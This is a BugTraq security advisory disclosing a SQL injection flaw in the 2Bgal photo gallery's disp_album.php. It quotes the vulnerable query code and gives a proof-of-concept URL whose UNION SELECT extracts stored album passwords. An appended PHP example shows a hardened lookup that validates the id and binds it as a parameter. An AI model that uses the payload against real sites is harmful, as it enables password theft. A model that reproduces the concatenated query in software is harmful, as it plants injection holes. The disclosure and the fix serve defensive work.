BugTraq
2Bgal : 2.4 & 2.5.1 SQL injection Vulnerability Dec 22 2004 07:49AM
zib zib (zibelette aol com)


2Bgal 2.5.1 SQL injection Vulnerability

(http://www.ben3w.com/)

12/22/2004

----------------------------------------------------------------------

Description:

----------------------------------------------------------------------

2Bgal is a fully customizable photo gallery.

It seems to be vulnerable to SQL injection.

----------------------------------------------------------------------

Vulnerable code (disp_album.php(~53) and maybe disp_img.php)

----------------------------------------------------------------------

$chaine="SELECT nom,idpere FROM ".$tbl_alist." WHERE id=".$id_album;

$request = MYSQL_QUERY($chaine);

$nom_currentalbum = mysql_result($request,0,"nom");

$idpere_currentalbum = mysql_result($request,0,"idpere");

----------------------------------------------------------------------

Proof of concept (2Bgal with MySQL 4.x.x):

----------------------------------------------------------------------

http://www.server.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%2
0passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201; --

This code allows you to get the password for the first album.

You can play with the SQL injection code to get other passwords.

----------------------------------------------------------------------

Version

----------------------------------------------------------------------

2Bgal 2.5.1

2Bgal 2.4 (seems to be affected too)

others not tested

----------------------------------------------------------------------

Discovered by Romain Le Guen:

http://coding.romainl.com

contact @AT@ romainl.com
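
Added example (not from the advisory or the 2Bgal project): one way to harden the disp_album.php lookup shown above, validating id_album as an integer and binding it as a parameter instead of concatenating it into the query. It assumes PDO with an in-memory SQLite table as a constructed stand-in for the MySQL album table; load_album() is a hypothetical helper name and the sample rows are constructed.

```php
<?php
// Added example, not 2Bgal code: the album lookup with input validation
// and a bound parameter. load_album() is a hypothetical helper.

function load_album(PDO $db, string $table, $rawId): ?array
{
    // Identifiers cannot be bound, so the configured table name is checked
    // against a strict pattern before it is placed in the SQL text.
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $table)) {
        throw new InvalidArgumentException('bad table name');
    }
    // id_album must be a positive integer; anything else is rejected outright.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // The value travels separately from the SQL text, typed as an integer.
    $stmt = $db->prepare("SELECT nom, idpere FROM $table WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database standing in for the MySQL album table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE galbumlist (id INTEGER PRIMARY KEY, nom TEXT, idpere INTEGER, passwd TEXT)');
$db->exec("INSERT INTO galbumlist VALUES (1, 'Holidays', 0, 'constructed-secret')");
$db->exec("INSERT INTO galbumlist VALUES (2, 'Family', 1, '')");

// A normal id and the advisory's injected value, as they would arrive in $_GET['id_album'].
$inputs = ['2', '2 UNION SELECT passwd as nom, idpere FROM galbumlist LIMIT 1; --'];
foreach ($inputs as $input) {
    $album = load_album($db, 'galbumlist', $input);
    echo json_encode($input), ' => ', json_encode($album), PHP_EOL;
}
```

The same validation and binding would apply to the query in disp_img.php if it builds its SQL the same way.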
